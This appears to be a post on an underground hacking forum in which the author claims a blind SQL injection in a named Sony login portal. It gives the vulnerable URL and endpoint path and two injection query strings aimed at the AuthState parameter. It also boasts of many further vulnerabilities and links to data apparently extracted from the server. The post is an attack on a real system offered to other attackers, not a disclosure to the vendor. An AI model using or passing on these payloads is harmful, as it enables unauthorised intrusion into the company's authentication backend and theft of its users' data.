29-09-25, 03:28 AM
Hello darkforums community, today I found a SQL injection in a backend login portal for Sony. I also found the server the endpoint is being hosted on, and I have found possibly HUNDREDS of vulnerabilities I can show you with the outdated software it uses.
The vulnerability is in this page:
https://idp.sel.sony.com/idp/module.php/...ervice.php?spentityid=https%3A%2F%2Fprod-pdp.sony.com%2F&cookieTime=1759084415
The two vulnerabilities I found are here:
###
Strategy: Blind bin
Method: GET
Path: /idp/module.php/core/loginuserpass.php
Query: AuthState=_db77880fa0f735eccf2c143ed0d31c668448bc0e2c:https://idp.sel.sony.com/idp/saml2/idp/SSOService.php?spentityid=https%3A%2F%2Fprod-pdp.sony.com%2F&cookieTime=1758743547+;select+1+where(<query>)--+-lz0H
Header: Content-Type: text/plain
###
Strategy: Blind bit
Method: GET
Path: /idp/module.php/core/loginuserpass.php
Query: AuthState=_db77880fa0f735eccf2c143ed0d31c668448bc0e2c:https://idp.sel.sony.com/idp/saml2/idp/SSOService.php?spentityid=https%3A%2F%2Fprod-pdp.sony.com%2F&cookieTime=1758743547+;select+1+where(<query>)--+-AO1X
Header: Content-Type: text/plain
Here are all the binary bits I extracted from the login portal: files.catbox.moe/vqrvu4.mp4
